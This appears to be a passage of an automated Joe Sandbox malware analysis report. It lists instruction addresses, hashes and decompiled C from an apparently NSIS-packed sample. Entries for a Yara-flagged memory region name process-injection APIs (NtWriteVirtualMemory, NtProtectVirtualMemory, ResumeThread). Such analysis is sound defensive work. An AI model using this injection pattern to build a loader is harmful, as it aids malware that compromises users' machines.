                                                    0x00406d4b
                                                    0x00406d4c
                                                    0x00406d4e
                                                    0x00406d50
                                                    0x00406d53
                                                    0x00406d56
                                                    0x00406d6c
                                                    0x00406d71
                                                    0x00406da9
                                                    0x00406da9
                                                    0x00406dad
                                                    0x00406dd9
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406de5
                                                    0x00406de8
                                                    0x00406de8
                                                    0x00406ded
                                                    0x00406ded
                                                    0x00406def
                                                    0x00406df2
                                                    0x00406df9
                                                    0x00406dfc
                                                    0x00406e29
                                                    0x00406e29
                                                    0x00406e2c
                                                    0x00406e2f
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00000000
                                                    0x00406ea3
                                                    0x00406e31
                                                    0x00406e37
                                                    0x00406e3a
                                                    0x00406e3d
                                                    0x00406e40
                                                    0x00406e43
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4c
                                                    0x00406e4f
                                                    0x00406e52
                                                    0x00406e6b
                                                    0x00406e6d
                                                    0x00406e70
                                                    0x00406e71
                                                    0x00406e74
                                                    0x00406e76
                                                    0x00406e79
                                                    0x00406e7b
                                                    0x00406e7d
                                                    0x00406e80
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e89
                                                    0x00406e8b
                                                    0x00406e8b
                                                    0x00406e8c
                                                    0x00406e8f
                                                    0x00406e92
                                                    0x00406e54
                                                    0x00406e54
                                                    0x00406e5c
                                                    0x00406e61
                                                    0x00406e63
                                                    0x00406e66
                                                    0x00406e66
                                                    0x00406e95
                                                    0x00406e9c
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00406e9c
                                                    0x00406daf
                                                    0x00406db2
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbd
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc5
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00406dc8
                                                    0x00406dcb
                                                    0x00406dd2
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00406dd2
                                                    0x00406d58
                                                    0x00406d5b
                                                    0x00406d5d
                                                    0x00406d60
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c4a
                                                    0x00406c4a
                                                    0x00406c4e
                                                    0x00407114
                                                    0x00000000
                                                    0x00407114
                                                    0x00406c54
                                                    0x00406c57
                                                    0x00406c5a
                                                    0x00406c5d
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c62
                                                    0x00406c65
                                                    0x00406c68
                                                    0x00406c6b
                                                    0x00406c6e
                                                    0x00406c71
                                                    0x00406c72
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c77
                                                    0x00406c7a
                                                    0x00406c7d
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c83
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ecb
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ed1
                                                    0x00406ed4
                                                    0x00406ed7
                                                    0x00406eda
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edf
                                                    0x00406ee2
                                                    0x00406ee5
                                                    0x00406ee8
                                                    0x00406eeb
                                                    0x00406eee
                                                    0x00406eef
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef4
                                                    0x00406ef7
                                                    0x00406efa
                                                    0x00406efd
                                                    0x00406f00
                                                    0x00406f04
                                                    0x00406f06
                                                    0x00406f09
                                                    0x00000000
                                                    0x00406f0b
                                                    0x00000000
                                                    0x00406f0b
                                                    0x00406f09
                                                    0x0040713e
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                    • Instruction ID: a9eeadc94889c10b02ffd6b9c25b4bb5d01c95f6ce45251ce11bee8d9ce53b4a
                                                    • Opcode Fuzzy Hash: c82c24978351f7c13972ed02e311308c491194f519d2ef9506af47d33a0889c0
                                                    • Instruction Fuzzy Hash: BFF18671D04229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281C7785A86CF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406555 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00406555(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426778); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426778;
			}




                                                    0x00406560
                                                    0x00406569
                                                    0x00000000
                                                    0x00406576
                                                    0x0040656c
                                                    0x00000000

                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(75F23420,00426778,00425F30,00405D17,00425F30,00425F30,00000000,00425F30,00425F30,75F23420,?,75F22EE0,00405A23,?,75F23420,75F22EE0), ref: 00406560
                                                    • FindClose.KERNEL32(00000000), ref: 0040656C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID: xgB
                                                    • API String ID: 2295610775-399326502
                                                    • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                    • Instruction ID: a17ed3a5ae88bd5f55df5b749dd223de66f1ff534e9406d7b6838b5a0b6fdea6
                                                    • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                    • Instruction Fuzzy Hash: 6FD01231904530ABC3111778BE0CC5B7A689F553717628F36F466F12F4C7348C22869C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03329178 Relevance: 2.9, Strings: 2, Instructions: 368COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: h$|
                                                    • API String ID: 0-702718193
                                                    • Opcode ID: 1cd37d4ae88633ca3ecd1b4dc58e5f18bb6b45032d8f1cec11687f5e85fbf7b8
                                                    • Instruction ID: 3930c70825af867b2d2fa411ba17c9461d857a7ba566aa9415605e0555892133
                                                    • Opcode Fuzzy Hash: 1cd37d4ae88633ca3ecd1b4dc58e5f18bb6b45032d8f1cec11687f5e85fbf7b8
                                                    • Instruction Fuzzy Hash: 4CE132756043898FDF38CF29CD947DA37A6FF99360F99812ECC899B205D3309A428B45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03330A7D Relevance: 1.8, APIs: 1, Instructions: 277nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtWriteVirtualMemory.NTDLL ref: 03330B18
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MemoryVirtualWrite
                                                    • String ID:
                                                    • API String ID: 3527976591-0
                                                    • Opcode ID: 1a7129a8836a73d1caa584fa14b280ad86b59d7460c6876f7526a38fc92f8c8e
                                                    • Instruction ID: c4fba3cde46cc09120416f18c6c7cbdd7b71ec377af69e3327af9a64af353dc0
                                                    • Opcode Fuzzy Hash: 1a7129a8836a73d1caa584fa14b280ad86b59d7460c6876f7526a38fc92f8c8e
                                                    • Instruction Fuzzy Hash: C951CA36014E814FC325CE78E9845CABFB1BE773657345B598249EF212F233570ACA9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332DB33 Relevance: 1.7, Strings: 1, Instructions: 490COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: |o
                                                    • API String ID: 0-2139680195
                                                    • Opcode ID: 0395949079afd195feb46cf3881e0d6a58cad4e80506c00fc96c1fa407d1fe9e
                                                    • Instruction ID: 81673095eead232e349d543aebb231f2d6458866699bbc7b72cf8888a58ae650
                                                    • Opcode Fuzzy Hash: 0395949079afd195feb46cf3881e0d6a58cad4e80506c00fc96c1fa407d1fe9e
                                                    • Instruction Fuzzy Hash: 6F027475A0435A9FDB34DF28C9957DA3BB6FF95350F54812ACC8E9BA06D3309A42CB01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 033449A1 Relevance: 1.5, APIs: 1, Instructions: 43nativethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 27fb029ad2b4525b6b41ec93b132366cae9f66212f204250c124218cf3efb007
                                                    • Instruction ID: aaddf2a85c4b8c1bcad1f97e7a783dd3a80ccb91df892c750163ed494ed670dc
                                                    • Opcode Fuzzy Hash: 27fb029ad2b4525b6b41ec93b132366cae9f66212f204250c124218cf3efb007
                                                    • Instruction Fuzzy Hash: 95016235608206CFDB28DF7689C43DD77E6AFC4208F168536CD468BA18D730BD458B00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03343960 Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtProtectVirtualMemory.NTDLL(45730A57,?,?,?,?,03342B05,A194FA60), ref: 03343A29
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2706961497-0
                                                    • Opcode ID: 15882b3973a410df89a2f5a1138da4aaaa811cf46fbd805865ff04e4823e93ff
                                                    • Instruction ID: b4c6c222415f299de9ac5a9ab87e56ca821e36e2dbfb216130fdf5abc9c15319
                                                    • Opcode Fuzzy Hash: 15882b3973a410df89a2f5a1138da4aaaa811cf46fbd805865ff04e4823e93ff
                                                    • Instruction Fuzzy Hash: 84F081711052848FDB24CF18C8466DBBBB6EFD4350F06811EEC899B214CB70AA00C745
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03329BC1 Relevance: .3, Instructions: 324COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 034ac6114a22b74666a314dea021f16550a0c2846bd8445450c7aeccd7395b48
                                                    • Instruction ID: c9dcc31e692312cfdafe1daaa74246ea6b25aba2937d3054fad6e0884a344361
                                                    • Opcode Fuzzy Hash: 034ac6114a22b74666a314dea021f16550a0c2846bd8445450c7aeccd7395b48
                                                    • Instruction Fuzzy Hash: CBC1E175A043499FEB34EF79CC947EA77E6EF95310F85802EDC899B644D7309A828B01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03341379 Relevance: .1, Instructions: 143COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b8376939414468f9054da49183ec23e19d6f526f61f0efdcb0e9089a43d6044
                                                    • Instruction ID: f6cbba2239ad0b7419f88cc71ba4d612f703a7038836a38a4e03ad6eb3d94719
                                                    • Opcode Fuzzy Hash: 5b8376939414468f9054da49183ec23e19d6f526f61f0efdcb0e9089a43d6044
                                                    • Instruction Fuzzy Hash: A351E1757053498FEF38DF29C8807DA77E6FF96350F448029CD8A9B215E3349A428B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0332A7BE Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: edcf753a3a82a6c5e488f6570a8cd72a98c3f98e33d5445d7bdf1c7a1ccf1f9a
                                                    • Instruction ID: c54bebf430cb81cc68c3d35fafaf2e1558f3650e64ff7dca6b7471a636186614
                                                    • Opcode Fuzzy Hash: edcf753a3a82a6c5e488f6570a8cd72a98c3f98e33d5445d7bdf1c7a1ccf1f9a
                                                    • Instruction Fuzzy Hash: 3841D275B043498FEF38DF298D807DA77A6FF99310F54812ADD8D9B204D731AA428B94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03340888 Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6bc898656fc23b31e43f2b2e7e307e5efe29c765da6470d24318fc2809142b7b
                                                    • Instruction ID: d600a2c102e054f046c7f3228fa783de67dd5b6ecea4ed752987da38601826f8
                                                    • Opcode Fuzzy Hash: 6bc898656fc23b31e43f2b2e7e307e5efe29c765da6470d24318fc2809142b7b
                                                    • Instruction Fuzzy Hash: 65418E747047498FEF38DF2ACC447DA77A6BF99310F548029CD8D9B615D331AA428B94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403DFE Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 255 403dfe-403e10 256 403f51-403f60 255->256 257 403e16-403e1c 255->257 259 403f62-403faa GetDlgItem * 2 call 4042d6 SetClassLongW call 40140b 256->259 260 403faf-403fc4 256->260 257->256 258 403e22-403e2b 257->258 261 403e40-403e43 258->261 262 403e2d-403e3a SetWindowPos 258->262 259->260 264 404004-404009 call 404322 260->264 265 403fc6-403fc9 260->265 267 403e45-403e57 ShowWindow 261->267 268 403e5d-403e63 261->268 262->261 273 40400e-404029 264->273 270 403fcb-403fd6 call 401389 265->270 271 403ffc-403ffe 265->271 267->268 274 403e65-403e7a DestroyWindow 268->274 275 403e7f-403e82 268->275 270->271 292 403fd8-403ff7 SendMessageW 270->292 271->264 272 4042a3 271->272 280 4042a5-4042ac 272->280 278 404032-404038 273->278 279 40402b-40402d call 40140b 273->279 281 404280-404286 274->281 283 403e84-403e90 SetWindowLongW 275->283 284 403e95-403e9b 275->284 288 404261-40427a DestroyWindow EndDialog 278->288 289 40403e-404049 278->289 279->278 281->272 286 404288-40428e 281->286 283->280 290 403ea1-403eb2 GetDlgItem 284->290 291 403f3e-403f4c call 40433d 284->291 286->272 294 404290-404299 ShowWindow 286->294 288->281 289->288 295 40404f-40409c call 406234 call 4042d6 * 3 GetDlgItem 289->295 296 403ed1-403ed4 290->296 297 403eb4-403ecb SendMessageW IsWindowEnabled 290->297 291->280 292->280 294->272 325 4040a6-4040e2 ShowWindow KiUserCallbackDispatcher call 4042f8 EnableWindow 295->325 326 40409e-4040a3 295->326 300 403ed6-403ed7 296->300 301 403ed9-403edc 296->301 297->272 297->296 305 403f07-403f0c call 4042af 300->305 302 403eea-403eef 301->302 303 403ede-403ee4 301->303 306 403f25-403f38 SendMessageW 302->306 308 403ef1-403ef7 302->308 303->306 307 403ee6-403ee8 303->307 305->291 306->291 307->305 311 403ef9-403eff call 40140b 308->311 312 403f0e-403f17 call 40140b 308->312 321 403f05 311->321 312->291 322 403f19-403f23 312->322 321->305 322->321 329 4040e4-4040e5 325->329 330 4040e7 325->330 326->325 331 4040e9-404117 GetSystemMenu EnableMenuItem SendMessageW 329->331 330->331 332 404119-40412a SendMessageW 331->332 333 40412c 331->333 334 404132-404170 call 40430b call 406212 lstrlenW call 406234 SetWindowTextW call 401389 332->334 333->334 334->273 343 404176-404178 334->343 343->273 344 40417e-404182 343->344 345 4041a1-4041b5 DestroyWindow 344->345 346 404184-40418a 344->346 345->281 348 4041bb-4041e8 CreateDialogParamW 345->348 346->272 347 404190-404196 346->347 347->273 349 40419c 347->349 348->281 350 4041ee-404245 call 4042d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 348->350 349->272 350->272 355 404247-40425f ShowWindow call 404322 350->355 355->281
                                                    C-Code - Quality: 83%
                                                    			E00403DFE(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t69;
				struct HWND__* _t75;
				signed int _t88;
				struct HWND__* _t93;
				signed int _t101;
				int _t105;
				signed int _t117;
				signed int _t118;
				int _t119;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				long _t132;
				int _t134;
				int _t135;
				void* _t136;

				_t117 = _a8;
				if(_t117 == 0x110 || _t117 == 0x408) {
					_t37 = _a12;
					_t127 = _a4;
					__eflags = _t117 - 0x110;
					 *0x423710 = _t37;
					if(_t117 == 0x110) {
						 *0x42a248 = _t127;
						 *0x423724 = GetDlgItem(_t127, 1);
						_t93 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216f0 = _t93;
						E004042D6(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429228);
						 *0x42920c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x423710 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t135 = 0;
					_t132 = (_t124 << 6) +  *0x42a260;
					__eflags = _t124;
					if(_t124 < 0) {
						L34:
						E00404322(0x40b);
						while(1) {
							_t39 =  *0x423710;
							 *0x40a39c =  *0x40a39c + _t39;
							_t132 = _t132 + (_t39 << 6);
							_t41 =  *0x40a39c; // 0x0
							__eflags = _t41 -  *0x42a264;
							if(_t41 ==  *0x42a264) {
								E0040140B(1);
							}
							__eflags =  *0x42920c - _t135;
							if( *0x42920c != _t135) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a264; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t118 =  *(_t132 + 0x14);
							E00406234(_t118, _t127, _t132, 0x43a000,  *((intOrPtr*)(_t132 + 0x24)));
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E004042D6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E004042D6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E004042D6(_t127);
							_t51 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2cc - _t135;
							_v32 = _t51;
							if( *0x42a2cc != _t135) {
								_t118 = _t118 & 0x0000fefd | 0x00000004;
								__eflags = _t118;
							}
							ShowWindow(_t51, _t118 & 0x00000008); // executed
							EnableWindow( *(_t136 + 0x30), _t118 & 0x00000100); // executed
							E004042F8(_t118 & 0x00000002);
							_t119 = _t118 & 0x00000004;
							EnableWindow( *0x4216f0, _t119);
							__eflags = _t119 - _t135;
							if(_t119 == _t135) {
								_push(1);
							} else {
								_push(_t135);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t135), 0xf060, ??);
							SendMessageW( *(_t136 + 0x38), 0xf4, _t135, 1);
							__eflags =  *0x42a2cc - _t135;
							if( *0x42a2cc == _t135) {
								_push( *0x423724);
							} else {
								SendMessageW(_t127, 0x401, 2, _t135);
								_push( *0x4216f0);
							}
							E0040430B();
							E00406212(0x423728, 0x429240);
							E00406234(0x423728, _t127, _t132,  &(0x423728[lstrlenW(0x423728)]),  *((intOrPtr*)(_t132 + 0x18)));
							SetWindowTextW(_t127, 0x423728); // executed
							_push(_t135);
							_t69 = E00401389( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t69;
							if(_t69 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t135;
								if( *_t132 == _t135) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x429218); // executed
									 *0x422700 = _t132;
									__eflags =  *_t132 - _t135;
									if( *_t132 <= _t135) {
										goto L58;
									}
									_t75 = CreateDialogParamW( *0x42a240,  *_t132 +  *0x429220 & 0x0000ffff, _t127,  *( *(_t132 + 4) * 4 + "sD@"), _t132); // executed
									__eflags = _t75 - _t135;
									 *0x429218 = _t75;
									if(_t75 == _t135) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t132 + 0x2c)));
									_push(6);
									E004042D6(_t75);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t136 + 0x10);
									ScreenToClient(_t127, _t136 + 0x10);
									SetWindowPos( *0x429218, _t135,  *(_t136 + 0x20),  *(_t136 + 0x20), _t135, _t135, 0x15);
									_push(_t135);
									E00401389( *((intOrPtr*)(_t132 + 0xc)));
									__eflags =  *0x42920c - _t135;
									if( *0x42920c != _t135) {
										goto L61;
									}
									ShowWindow( *0x429218, 8);
									E00404322(0x405);
									goto L58;
								}
								__eflags =  *0x42a2cc - _t135;
								if( *0x42a2cc != _t135) {
									goto L61;
								}
								__eflags =  *0x42a2c0 - _t135;
								if( *0x42a2c0 != _t135) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x429218);
						 *0x42a248 = _t135;
						EndDialog(_t127,  *0x421ef8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t132 - _t135;
							if( *_t132 == _t135) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t88 = E00401389( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t88;
						if(_t88 == 0) {
							goto L33;
						}
						SendMessageW( *0x429218, 0x40f, 0, 1);
						__eflags =  *0x42920c;
						return 0 |  *0x42920c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t135 = 0;
					if(_t117 == 0x47) {
						SetWindowPos( *0x423708, _t127, 0, 0, 0, 0, 0x13);
					}
					if(_t117 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x423708,  ~(_a12 - 1) & _t117);
					}
					if(_t117 != 0x40d) {
						__eflags = _t117 - 0x11;
						if(_t117 != 0x11) {
							__eflags = _t117 - 0x111;
							if(_t117 != 0x111) {
								L26:
								return E0040433D(_t117, _a12, _a16);
							}
							_t134 = _a12 & 0x0000ffff;
							_t128 = GetDlgItem(_t127, _t134);
							__eflags = _t128 - _t135;
							if(_t128 == _t135) {
								L13:
								__eflags = _t134 - 1;
								if(_t134 != 1) {
									__eflags = _t134 - 3;
									if(_t134 != 3) {
										_t129 = 2;
										__eflags = _t134 - _t129;
										if(_t134 != _t129) {
											L25:
											SendMessageW( *0x429218, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2cc - _t135;
										if( *0x42a2cc == _t135) {
											_t101 = E0040140B(3);
											__eflags = _t101;
											if(_t101 != 0) {
												goto L26;
											}
											 *0x421ef8 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AF();
											goto L26;
										}
										E0040140B(_t129);
										 *0x421ef8 = _t129;
										goto L21;
									}
									__eflags =  *0x40a39c - _t135; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t134);
								goto L22;
							}
							SendMessageW(_t128, 0xf3, _t135, _t135);
							_t105 = IsWindowEnabled(_t128);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t127, _t135, _t135);
						return 1;
					} else {
						DestroyWindow( *0x429218);
						 *0x429218 = _a12;
						L58:
						if( *0x425728 == _t135 &&  *0x429218 != _t135) {
							ShowWindow(_t127, 0xa);
							 *0x425728 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                    0x00403e07
                                                    0x00403e10
                                                    0x00403f51
                                                    0x00403f55
                                                    0x00403f59
                                                    0x00403f5b
                                                    0x00403f60
                                                    0x00403f6b
                                                    0x00403f76
                                                    0x00403f7b
                                                    0x00403f7d
                                                    0x00403f7f
                                                    0x00403f82
                                                    0x00403f87
                                                    0x00403f95
                                                    0x00403fa2
                                                    0x00403fa9
                                                    0x00403fa9
                                                    0x00403faa
                                                    0x00403faa
                                                    0x00403faf
                                                    0x00403fb5
                                                    0x00403fbc
                                                    0x00403fc2
                                                    0x00403fc4
                                                    0x00404004
                                                    0x00404009
                                                    0x0040400e
                                                    0x0040400e
                                                    0x00404013
                                                    0x0040401c
                                                    0x0040401e
                                                    0x00404023
                                                    0x00404029
                                                    0x0040402d
                                                    0x0040402d
                                                    0x00404032
                                                    0x00404038
                                                    0x00000000
                                                    0x00000000
                                                    0x00404043
                                                    0x00404049
                                                    0x00000000
                                                    0x00000000
                                                    0x00404052
                                                    0x0040405a
                                                    0x0040405f
                                                    0x00404062
                                                    0x00404068
                                                    0x0040406d
                                                    0x00404070
                                                    0x00404076
                                                    0x0040407b
                                                    0x0040407e
